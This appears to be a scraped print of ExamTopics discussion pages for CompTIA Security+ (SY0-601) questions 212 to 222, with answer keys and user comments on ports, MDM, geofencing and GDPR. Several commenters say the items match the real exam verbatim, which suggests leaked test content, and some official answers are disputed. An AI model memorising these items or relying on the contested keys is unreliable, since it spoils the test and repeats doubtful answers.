  carpathia 2 months, 3 weeks ago


Selected Answer: A
Memdump is a Linux utility, then I would go with A. I am assuming memdump has to be run on the live system which it is not necessarly a Linux
in our case. It must be DD.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 370/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  Sir_Learnalot 2 months, 3 weeks ago
Selected Answer: A
dd will give you a raw image of System that can be used in tools like Autopsy or FTK to analyse without the risk of damaging the original
data/device. Also it would allow you to return the device, and continue analysing the dd copy. So "A" it is
upvoted 5 times

  zharis 3 months, 1 week ago


Selected Answer: B
dd is used for disk imaging
upvoted 3 times

  abrilo 3 months, 3 weeks ago


DD allows you to create a bit-by-bit copy of all of the information that may be on a drive or in a directory. This can obviously be very useful if you
need to capture this information in order to perform additional analysis later...from professormessor
upvoted 4 times

  tswerv 4 months, 1 week ago


About to go to the exam today. Hopefully this will be my last time having to take the exam. Good luck to everyone
upvoted 4 times

  tswerv 4 months, 1 week ago


update: I passed the exam with a 790!
upvoted 20 times

  KelvinNguyen3011 3 months, 3 weeks ago


Do you feel difficult ?
upvoted 2 times

  Tony992 4 months, 1 week ago


Took the exam today and passed! All the PBQs from this dump were on the exam plus about 70% of the multiple-choice questions were
verbatim. I did notice a few of the questions were identical but some of the answers were different. Good luck everyone!
upvoted 7 times

  enginne 4 months, 2 weeks ago


Selected Answer: A
I think that in case memdump tool Comptia reminds about memory
upvoted 2 times

  Ay_ma 4 months, 2 weeks ago


A complete memory dump records all the contents of system memory when your computer stops unexpectedly. A complete memory dump may
contain data from processes that were running when the memory dump was collected. (microsoft.com)

dd allows us to copy raw data from one source to another. It lets us read from and write to block devices — for example, physical hard drives. We
could duplicate everything from one disk to another, including the partition table, the boot sector, and the access times of files in the filesystem
— in fact, everything on a raw data level.

My take on this is that memdump can be used to get the info, dd copies that info to a hard drive, so that the main laptop can be returned to the
user. Therefore, I'm leaning towards A.

Please correct me if I'm wrong.


upvoted 3 times

  Ay_ma 4 months, 2 weeks ago


I've set my exam for this coming Monday. I wonder how many times people went through the questions before their exam. How many times do
you recommend?
upvoted 2 times

  Ay_ma 4 months, 1 week ago


Eventually took the exam today. About 85% of my questions came from here, but I also used the CompTIA study guide to complement my
study.

Some of the questions had completely different answers to choose from, so having a good understanding of the questions and the answers
will do you good.

I advise that you memorize the simulations thoroughly, I had 3 of them on my test.

I passed with a 779, so not too bad. I wish you all good luck!
upvoted 8 times

  Halaa 4 months, 2 weeks ago


I think twice is fine !
upvoted 1 times

  k9_462 4 months, 2 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 371/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

i would use this guide daily for about a month. this guide is directly from the pass4sure engine with the original 211 questions. keep in mind
though, that pass4sure recently updated their program to have 246 questions. i can verify that the newly added questions were the25% or so
questions i had on my test yesterday that were not contained in the original 211 question pool.
the problem is, they still have not updated all of the wrong answers they had (at least 40) and thats why this guide was so helpful. if you
understand the questions currently here, you will know enough to get you through... good luck...
upvoted 5 times

  gen2dee 4 months, 2 weeks ago


mine is Monday too...good luck to us!
upvoted 3 times

  k9_462 4 months, 3 weeks ago


Good Luck to all that are preparing to take the exam.
took mine this morning and passed. best advice i can give is pay close attention to the discussions and the rational people use to come up with
an answer. it helped me immensely.
about 70% of the questions came directly from this pool and the rest were variations on the same questions being asked. if you pay attention to
the discussions, it will help you out a LOT... thank you everybody that contributed.
upvoted 8 times

  j0n45 4 months, 4 weeks ago


Answer is D.
@Stoneface how did it go? 😊 I'd like to thank you for your efforts too, I saw you put many comments in the discussions that are very helpful.
upvoted 2 times

  varun0 4 months, 4 weeks ago


Good luck bois
upvoted 2 times

  comeragh 5 months ago


@stoneface. How did you get on with the exam??
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 372/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #212 Topic 1

An analyst is trying to identify insecure services that are running on the internal network. After performing a port scan, the analyst identifies that a
server has some insecure services enabled on default ports. Which of the following BEST describes the services that are currently running and the
secure alternatives for replacing them? (Choose three.)

A. SFTP, FTPS

B. SNMPv2, SNMPv3

C. HTTP, HTTPS

D. TFTP, FTP

E. SNMPv1, SNMPv2

F. Telnet, SSH

G. TLS, SSL

H. POP, IMAP

I. Login, rlogin

Correct Answer: BCF

Community vote distribution


BCF (100%)

  rodwave 2 months, 3 weeks ago


Selected Answer: BCF
Answer: SNMPv2, SNMPv3 | HTTP, HTTPS | Telnet, SSH

SNMP v3 adds cryptographic security to SNMP v2. SNMP v3 replaces the simple password sharing (as clear text) in SNMP v2 with a much more
secure encoded security parameters.

HTTPS is HTTP with encryption and verification. The only difference between the two protocols is that HTTPS uses TLS (SSL) to encrypt normal
HTTP requests and responses, and to digitally sign those requests and responses. As a result, HTTPS is far more secure than HTTP.

Telnet transfers the data in simple plain text. On other hand SSH uses Encrypted format to send data and also uses a secure channel. As SSH is
more secure so it uses public key encryption for authentication.
upvoted 3 times

  comeragh 3 months, 3 weeks ago


Selected Answer: BCF
Agree with B,C,F here
upvoted 2 times

  serginljr 4 months ago


Selected Answer: BCF
BCF correct
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 373/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #213 Topic 1

A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how
future incidents can be avoided. During which of the following stages of the response process will this activity take place?

A. Recovery

B. Identification

C. Lessons learned

D. Preparation

Correct Answer: C

Community vote distribution


C (100%)

  garlandboy Highly Voted  4 months ago


Agree with C
upvoted 6 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: C
Answer: Lessons learned

Lessons learned or remediation step is the final phase of the incident response. It examines and documents how well the team responded,
discovers what caused the incident, and determines how the incident can be avoided in the future.
=======================
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: C
CompTIA really love lessons learned...get the feeling like every incident response process question is about lessons learned
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
This is Lessons Learned. This takes place after everything has a occurred and the team is trying to figure out how to do better.

Also, for anyone that has reached this point and realized that they discussions have become less and less. That's because a month ago the
questions stopped at #211. So from here on out it's just the newer participants.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 374/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #214 Topic 1

An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP. Which of
the following would BEST accomplish this goal?

A. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 67 -

Allow: Any Any 68 -

Allow: Any Any 22 -

Deny: Any Any 21 -


Deny: Any Any

B. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 67 -

Allow: Any Any 68 -

Deny: Any Any 22 -

Allow: Any Any 21 -


Deny: Any Any

C. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 22 -

Deny: Any Any 67 -

Deny: Any Any 68 -

Deny: Any Any 21 -


Allow: Any Any

D. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Deny: Any Any 67 -

Allow: Any Any 68 -

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 375/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Allow: Any Any 22 -

Allow: Any Any 21 -


Allow: Any Any

Correct Answer: A

Community vote distribution


A (100%)

  snofear Highly Voted  4 months ago


Selected Answer: A
A is correct, DHCP ports are 67,68, FTP:21, SFTP:22, and web pages are accessed through 443 and insecure http 80.
upvoted 10 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: A
A. [Permission Source Destination Port]

Allow: Any Any 80 -

Allow: Any Any 443 -

Allow: Any Any 67 -

Allow: Any Any 68 -

Allow: Any Any 22 -

Deny: Any Any 21 -


Deny: Any Any

This firewall rule set would accomplish the goal of only allowing access to DHCP, web pages, and SFTP, and specifically blocking FTP. The
firewall would allow access to ports 80 and 443, which are the standard ports for web pages. Port 67 and 68 are the standard ports for DHCP.
Port 22 is the standard port for SFTP. FTP uses port 21, which is blocked in the rule set. The final rule, "Deny: Any Any" would block all other
traffic that does not match the allowed ports.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
A is the answer
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
This is just a breakdown of the ports:

67 & 68 = DHCP (Dynamic Host Configuration Protocol): DHCP a client/server protocol that automatically provides IP addresses to clients. UDP
Port 67 is used by the DHCP server to dynamically assign IP addresses. UDP Port 68 is the DHCP client port which is used by clients to obtain
an IP address from a DHCP server.

20 & 21 = FTP (File Transfer Protocol): FTP is used to communicate and transfer files between computers. TCP Port 20 is the "data port" where
the actual data transfer occurs and Port 21 is the "control port" where the client makes the connection request and management.

22 = SSH (Secure Shell) & SFTP (Secure File Transfer Protocol): SSH is a protocol that enables two computers to communicate securely by
encrypting the connection. SFTP is a secure file transfer protocol that uses SSH encryption to securely send and receive file transfers.

80 & 443 = HTTP / HTTPS: HTTP(80) is a default network port used to send and receive unencrypted web pages. HTTPS(443) is HTTP but uses
TLS to encrypt normal HTTP requests/responses.
upvoted 4 times

  Gino_Slim 3 months, 1 week ago


You need to know your ports this time around. They are testing your knowledge on that. Look up common ports and try to hold those to memory.
That will help you with a few questions on the exam.
upvoted 3 times

  comeragh 3 months, 3 weeks ago


Selected Answer: A
Agree with A being correct here. Initially narrowed it down to A and C and narrowed down further to A being correct answer as C was blocking
port 67/68 (DHCP)
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 376/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Ha9ate 4 months ago


Selected Answer: A
allow
http = 80
https = 443
DHCP client = 68
DHCP server = 67
SFTP = 22
deny
FTP = 21
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 377/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #215 Topic 1

While investigating a recent security incident, a security analyst decides to view all network connections on a particular server. Which of the
following would provide the desired information?

A. arp

B. nslookup

C. netstat

D. nmap

Correct Answer: C

Community vote distribution


C (100%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Answer: netstat

The netstat command shows all active network connections, network interface information, and ports that are listening. The question is asking to
view all the connections on the server which the netstat command will do.

==================================
Nmap or network mapper is a network discovery and security auditing tool mainly used to find services, hosts, and open ports on a network.

Nslookup - This command queries DNS servers to obtain DNS records

ARP Command is a TCP/IP utility used for viewing and modifying the local Address Resolution Protocol (ARP) cache.
upvoted 8 times

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: C
The reason why it's nestat and not nmap for this question:

Nmap is a Network mapping tool. That means it's used to discover information about hosts on a network (their ip, open ports, etc). Where netstat
is a network statistic tool used to list active connections.

The question is asking about seeing active connections.


upvoted 6 times

  Oval61251 3 months ago


Very helpful, thank you
upvoted 2 times

  ronniehaang Most Recent  4 days, 1 hour ago


Selected Answer: C
C. netstat

Netstat (Network Statistics) is a command-line utility that can be used to display the current network connections on a server, including incoming
and outgoing connections, as well as network statistics, such as the number of packets sent and received, and the number of errors. Netstat can
be used to view the status of TCP and UDP connections, including information about the local and remote addresses, the state of the
connection, and the process ID (PID) associated with the connection. This information can be used by the security analyst to identify any
suspicious connections or traffic patterns, and to help determine the source of the security incident.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Wouldnt nmap also work?
upvoted 2 times

  omodara 4 months ago


Ans A. netstat -a will display all the current active connections, the internet protocol type, IP addresses, port numbers, and the state of the
connection
upvoted 1 times

  omodara 4 months ago


I meant answer is C, Netstat sorry for the typo
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 378/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #216 Topic 1

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile
applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should
the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

A. Enable the remote-wiping option in the MDM software in case the phone is stolen.

B. Configure the MDM software to enforce the use of PINs to access the phone.

C. Configure MDM for FDE without enabling the lock screen.

D. Perform a factory reset on the phone before installing the company's applications.

Correct Answer: C

Community vote distribution


B (94%) 6%

  Kashim Highly Voted  4 months ago


Selected Answer: B
B. Configure the MDM software to enforce the use of PINs to access the phone. - it is the only answer that honestly have sense to me.
FDE (full disc encription) does not address those problems
upvoted 8 times

  Demichollo 3 weeks, 2 days ago


I believe option B makes more sense
upvoted 1 times

  Thanks_stoneface 1 day, 20 hours ago


Most Recent 
B - This is the only option that doesn’t affect the employees personal data on their personal phone. It’s the least intrusive while providing some
protection of company data.
upvoted 1 times

  ronniehaang 4 days ago


Selected Answer: A
A. Enable the remote-wiping option in the MDM software in case the phone is stolen.

This option would allow the company to remotely wipe only the company data from the employee's device in case it's lost or stolen, while
preserving the employee's personal data. This addresses both the company's concern of protecting its data and the employee's concern of
preserving their personal data. The use of remote-wiping in conjunction with encryption, such as full disk encryption (FDE), can provide an added
layer of protection for sensitive company data stored on the device.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I would go with A as the biggest concern of dat a loss is when the device is lost or stolen, whether it has a pin or not. I am not sure though as the
company has to have a policy (in MDM) stating they can wipe the BYOD owner data as well. God knows.
upvoted 2 times

  ronah 1 month, 3 weeks ago


from comptia a+ to net+ the answer is always wiping data if it's stolen.
upvoted 1 times

  ronah 1 month, 3 weeks ago


oh but the question state the user is afraid to "lost his Personal data" hence his not talking about companies data. i will go for b.
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I'll go with B in th end - after going through a Comptia book on the subject.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: B
Due to process of elimination, B, is the only one that comes close. A and D are talking about wiping the phone which doesn't help with the
employee concerns. The other just doesn't even begin to apply. "Full Disk Encryption" is definitely causing personal loss.
upvoted 1 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: B
Only B makes any sense.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 379/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 3 times
  theglass 3 months, 4 weeks ago
Selected Answer: B
B is the only one that makes sense to me.
upvoted 3 times

Question #217 Topic 1

The concept of connecting a user account across the systems of multiple enterprises is BEST known as:

A. federation.

B. a remote access policy.

C. multifactor authentication.

D. single sign-on.

Correct Answer: A

Community vote distribution


A (100%)

  omodara Highly Voted  4 months ago


Answer A is correct. SSO allows users to use a single set of credentials to access multiple systems within a single organization (a single domain)
while Federation allow users to access systems across multiple organizations.
upvoted 10 times

  alayeluwa 3 months, 3 weeks ago


Niceee
upvoted 1 times

  Gino_Slim Most Recent  3 months, 1 week ago


Selected Answer: A
It's A this time and not D this time because SSO (single sign on) lets you access multiple things within YOUR domain/organization. Federation
allows you to go to multiple of those with one set of credentials.
upvoted 1 times

  passmemo 4 months ago


Selected Answer: A
Federation
upvoted 2 times

  serginljr 4 months ago


Selected Answer: A
A correct
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 380/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #218 Topic 1

A user received an SMS on a mobile phone that asked for bank details. Which of the following social-engineering techniques was used in this
case?

A. SPIM

B. Vishing

C. Spear phishing

D. Smishing

Correct Answer: D

Community vote distribution


D (100%)

  omodara Highly Voted  4 months ago


I go with D. SPIM is unwanted messages sent over instant messaging (IM) channels, Vishing is VOIP, Spear phishing is targeting a specific group
or individual via email.
upvoted 9 times

  mlonz 5 days, 9 hours ago


Most Recent 
Smishing (a mashup of SMS and phishing) is a form of phishing that uses text instead of email. Some smishing texts include malicious
attachments, and some try to trick the user into giving up personal information.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: D
Just think of "smishing" as "SMS Phishing"
upvoted 2 times

  serginljr 4 months ago


Selected Answer: D
D correct
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 381/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #219 Topic 1

A company is working on mobile device security after a report revealed that users granted non-verified software access to corporate data. Which
of the following is the MOST effective security control to mitigate this risk?

A. Block access to application stores

B. Implement OTA updates

C. Update the BYOD policy

D. Deploy a uniform firmware

Correct Answer: C

Community vote distribution


A (76%) C (21%)

  Kashim Highly Voted  4 months ago


Selected Answer: A
A. Block access to application stores - in my opinion it is the most effective way to prevent standatd users form installing unknown software if
they are using corporte owned mobile phones
upvoted 11 times

  NICKJONRIPPER 2 months, 1 week ago


app from app stores can be much more safer than downloaded apk.
upvoted 1 times

  ronniehaang Most Recent  4 days ago


Selected Answer: D
D. Deploy a uniform firmware

The most effective security control to mitigate the risk of users granting non-verified software access to corporate data is deploying a uniform
firmware. This is because a uniform firmware ensures that all mobile devices have the same software version, which makes it easier to monitor
and control the access of different software applications to corporate data. This ensures that only authorized and verified software applications
can access the corporate data, reducing the risk of exposure to malicious or untrusted software. By deploying a uniform firmware, the company
can also reduce the risk of security vulnerabilities, as it can easily patch and update the firmware to address any known security issues.
upvoted 1 times

  its_melly 1 month ago


Selected Answer: A
From my understanding and previous experience managing MDM, I believe the "non-verified" part of the question is referring to the company
itself not verifying. For example, someone installs Facebook from the app store and allows it access to the photos app that contains company
images. Facebook is a verified app in all app stores but would be considered a non verified application to the company because they didn't
approve of the install. Therefor blocking access to the app store will keep them from installed applications they haven't approved.

Assuming the device is a personal device and user can go online and download applications outside of the app store is reading too much into
the question. Look at what it asked specifically.
upvoted 3 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
Blocking access to application stores is not as effective as updating the BYOD policy for mitigating the risk of granting non-verified software
access to corporate data. Blocking access to application stores would prevent users from downloading any software from external sources,
including trusted and verified sources. This could prevent users from accessing important apps and tools, and it would not address the
underlying issue of users granting access to corporate data to non-verified software. Updating the BYOD policy, on the other hand, would allow
the company to specify which types of software are allowed on corporate devices, require that employees only download software from trusted
sources, and implement other controls to prevent the use of non-verified software. This would provide a more targeted and effective solution for
mitigating the risk of granting access to corporate data to non-verified software
upvoted 2 times

  Sandon 1 month, 3 weeks ago


Nope, it never said the devices are personally owned.
upvoted 1 times

  TKW36 2 months, 1 week ago


Selected Answer: A
It doesn't say these mobile devices are personally owned, they could be corporate owned so updating the BYOD policy wouldn't help. Going
with A.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 382/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  JSOG 2 months, 2 weeks ago


Selected Answer: C
from quizlet, the ans is C which was what i was guessing would be the ans
upvoted 1 times

  JSOG 2 months, 2 weeks ago


moreover, blocking access to apk store wouldnt be right cus that would prevent employess from using their device as they would normally do,
thus the company woudnt deprive them from that except they decide to have them use COPE devices
upvoted 1 times

  Sbuda002 3 months ago


Selected Answer: C
Apk can be downloaded directly from internet. The policy is the only thing that can affect the settings, which is were the permissions are set
upvoted 2 times

  yasuke 2 months, 3 weeks ago


Do application stores have verified SW or non-verified SW? they must have downloaded the apk from somewhere else. byod policy update
makes sense here.
upvoted 2 times

  zharis 3 months, 1 week ago


Selected Answer: C
BYOD is a security framework for personally owned devices that needs to be updated
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
Generally with mobile devices applications are downloaded from App Store/Play Store. So, this would apply this time around. You can update the
policy all day but that doesn't mean it's going to be abided by.
upvoted 2 times

  03allen 3 months, 2 weeks ago


it doesn't say it's a work mobile, could be a BYOD one signed in with work data(e.g. Outlook)
upvoted 2 times

  andrizo 3 months, 3 weeks ago


Selected Answer: A
Permissions to corp data, had to reread
upvoted 2 times

  abrilo 3 months, 3 weeks ago


even if the company blocks access to app stores, can't the users get apps from the web?
upvoted 3 times

  Gino_Slim 3 months, 1 week ago


I mean it's possible with side-loading but most users aren't doing that. Generally with mobile devices applications are downloaded from App
Store/Play Store. So, this would apply this time around
upvoted 1 times

  passmemo 3 months, 3 weeks ago


Selected Answer: A
No doubt
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: A
I'd vote A, considering this is the BEST way to prevent them, it doesn't give any other restrictions, or say who owned the devices.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 383/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #220 Topic 1

A security analyst needs to implement security features across smartphones, laptops, and tablets. Which of the following would be the MOST
effective across heterogeneous platforms?

A. Enforcing encryption

B. Deploying GPOs

C. Removing administrative permissions

D. Applying MDM software

Correct Answer: A

Community vote distribution


D (92%) 8%

  Ha9ate Highly Voted  4 months ago


Selected Answer: D
I will choose D.Because smartphones, laptops, and tablets all can install MDM to manage device
upvoted 9 times

  JSOG Most Recent  2 months, 1 week ago


Selected Answer: D
correction the ans is D
upvoted 1 times

  JSOG 2 months, 2 weeks ago


Selected Answer: A
A ans for me
upvoted 1 times

  JSOG 2 months, 1 week ago


ans D my bad
upvoted 1 times

  zharis 3 months, 1 week ago


Selected Answer: D
MDM sounds convincing. Encryption on mobile phones?
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


It's not A everyone.

Also, MDM is Mobile Device Management. Kind of a dead giveaway.


upvoted 1 times

  snofear 4 months ago


Jup definitely D,
MDM stands for Mobile Device Management, is software that assists in the implementation of the process of managing, monitoring, and securing
several mobile devices such as tablets, smartphones, and laptops used in the organization to access the corporate information.
upvoted 3 times

  JSOG 2 months, 1 week ago


ans is D guys
upvoted 1 times

  serginljr 4 months ago


In the old test the correct answer was D.

https://www.examtopics.com/discussions/comptia/view/76878-exam-sy0-601-topic-1-question-329-discussion/
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 384/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #221 Topic 1

The new Chief Information Security Officer at a company has asked the security team to implement stronger user account policies. The new
policies require:

* Users to choose a password unique to their last ten passwords


* Users to not log in from certain high-risk countries

Which of the following should the security team implement? (Choose two.)

A. Password complexity

B. Password history

C. Geolocation

D. Geofencing

E. Geotagging

F. Password reuse

Correct Answer: BC

Community vote distribution


BD (58%) BC (39%)

  passmemo Highly Voted  4 months ago


Selected Answer: BC
Password history and Geolocation
upvoted 13 times

  comeragh Highly Voted  3 months, 3 weeks ago


Selected Answer: BD
I would go with B&D here. Password history self explanatory.
Geolocation - geolocation is often used to track the movements and location of people and surveillance. More for tracking than restricting
access. Open to discussion here...
upvoted 9 times

  Matt0123 Most Recent  2 weeks, 5 days ago


Selected Answer: BD
Geolocation is not for preventing access, think of a fence keeping someone out
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: BC
B. Password history
C. Geolocation
upvoted 2 times

  viksap 1 month, 2 weeks ago


Selected Answer: BD
Geofencing: a virtual geographic fence. Geolocation is a tracking method
upvoted 2 times

  ebeewhy 1 month, 2 weeks ago


Selected Answer: BD
From the CompTIA Study guide - "Geofencing refers to accepting or rejecting access based on location."
upvoted 1 times

  JSOG 2 months ago


Selected Answer: BD
Geolocation uses Global Positioning System (GPS) to identify a
device’s location. Geofencing uses GPS to create a virtual fence or
geographic boundary. Organizations use geofencing to enable access
to services or devices within the boundary and block access outside
the boundary. from the compTIA sec ebook page 518
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 385/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Nome02 2 months ago


B. For password history so it can be reused for last 10 passwords.
D. To restrict the access from defined geographical location. (Geolocation only tell the GPS based location of device, not restrict the access).
upvoted 3 times

  carpathia 2 months, 1 week ago


Selected Answer: BD
Geolocation is not used for not allowing devices when in certain locations (Conklin's book).
upvoted 2 times

  okay123 2 months, 2 weeks ago


Selected Answer: BD
Geofencing is a technology for setting virtual boundaries and triggering events when these boundaries are crossed by a mobile device on which
certain software is installed.
VS
Geolocation is a technology that uses data acquired from an individual's computer or mobile device to identify or describe the user's actual
physical location.

So, B and D makes sense. Geolocation is for tracking, Geofencing is for triggering actions like blocking...
upvoted 5 times

  carpathia 2 months, 3 weeks ago


Selected Answer: BD
"Geofencing is a location-based service that triggers actions in the mobile application or other software programs when the device enters a set
location". Geo location doen't do that.
upvoted 3 times

  ImpactTek 2 months, 3 weeks ago


B. Password history is obvious.

geolocation= Geolocation is the process of identifying and tracking the location of linked electronic devices using location technologies such as
GPS or IP addresses.

geofencing = Geofencing is a location-based approach that allows a physical location to be given virtual boundaries. These virtual perimeters can
be shown on a map and used to initiate actions or alerts when people enter, exit, or remain in the region.

therefore I go with geofencing because it's purpose is to allow or block, but geolocation is just for identifying and tracking.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: BC
Answer: Geolocation & Password history

Password history policies determines the number of unique new passwords that must associated with a user's account before an old password
be reused. The security can implement password history and allow the user to use a old password after 10 new unique passwords.

Geolocation uses GPS or IP addresses to identify and track the location of connected devices. The security team configure Geolocation rules
that would block login attempts by location like the high-risk countries.
upvoted 3 times

  Sir_Learnalot 2 months, 3 weeks ago


Selected Answer: BD
I did quite a bit of research on this one, but I think i finally got to a conclusion. First get the ovious answer out of the way: B - Password histroy --
> I think most of us get that.
Now to the controversial answer: It should be "D" because Geolocation is the technology used to perform Geofencing. And to actually restrict
logins from certain locations you would use gefencing. Here is a video explaining it pretty well: https://www.professormesser.com/security-
plus/sy0-601/sy0-601-video/mobile-device-management-2/
upvoted 2 times

  Imok 3 months ago


Selected Answer: BD
Password History and Geofencing (for authentication)
upvoted 3 times

  ostralo 3 months, 2 weeks ago


Selected Answer: BC
History
Geolocation - Identify a request’s country of origin, and block IPs coming from countries with high fraud activity
upvoted 2 times

  Lv2023 3 months, 3 weeks ago


I would say option (F) to satisfy the first requirement. Password reuse is the practice of preventing the selection of a password that has already
been used. "The history attribute sets how many previous passwords are blocked." This as per the comptia study guide. I say option (D) to
satisfy the second requirement.
upvoted 2 times
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 386/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 387/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #222 Topic 1

Which of the following is MOST likely to outline the roles and responsibilities of data controllers and data processors?

A. SSAE SOC 2

B. PCI DSS

C. GDPR

D. ISO 31000

Correct Answer: C

Community vote distribution


C (55%) A (45%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: SSAE SOC 2

SSAE SOC 2(Standards of Attestations Engagement No. 16, System and Organizations Controls Report 2, Type 2) - auditing report that assesses
how well organizations handle data security, system privacy, data confidentiality and data processing processes.

======================
GDPR (General Data Protection Regulation) - a regulation in EU laws that requires businesses to protect the personal data and privacy of EU
citizens for transactions that occur within EU member states.

The ISO 31000 Risk Management framework is an international standard that provides businesses with guidelines and principles for risk
management from the International Organization for Standardization.

PCI DSS (Payment Card Industry Data Security Standard) is a set of security standards for organizations that handle credit cards.
upvoted 10 times

  Sandon 2 months, 1 week ago


Statements on Standards for Attestation Engagements, Service Organization Control Type II*
upvoted 2 times

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: C
I looked into this and a LOT of sources are saying GDPR. So, let's go with that guys. We can't all be wrong..........I mean we can't right?

Right...?
upvoted 9 times

  alwaysrollin247 1 month, 1 week ago


Well, the question doesn't say anything about EU and since GPDR is an EU regulation, the best alternate choice would be SSAE SOC 2. I
mean honestly, don't you think this would be outlined in another source outside of the EU for the rest of the world?
upvoted 3 times

  PraygeForPass Most Recent  3 weeks ago


Selected Answer: A
Another COMPTIA funny question.
We have no mention of the EU, so who does this apply to specifically?

What if this question is in relation to NA or some other entity...


I'm going with A since the definition of SSAE SOC 2 fits the question..
upvoted 1 times

  IzaacL23 1 month, 1 week ago


Selected Answer: A
Yeah this is totally A without a doubt. GDPR shows how to deal with security information only for EU. SSAE SOC 2 is a universal report that
establishes security controls and roles.
upvoted 1 times

  FMMIR 2 months ago


Selected Answer: C
The General Data Protection Regulation (GDPR) has been the most comprehensive data protection law to date. According to the GDPR, personal
data is any information related to an identifiable person or data subject. The personal information includes name, location, the ID number of an
entity, and special category information consists of the physiological, genetic, and social identity of the person. These data must be controlled
and processed by the data controllers and data processors.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 388/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times

  Ranaer 2 weeks, 3 days ago


Seeing how on pretty much every topic you are picking the wrong answers, I am confident that you are wrong this time aswell. The correct
answer should be A.
upvoted 1 times

  Ranaer 4 days ago


Disregard my attitude. It seems I was annoyed at something at the time of writing this.
upvoted 1 times

  Sir_Learnalot 2 months, 3 weeks ago


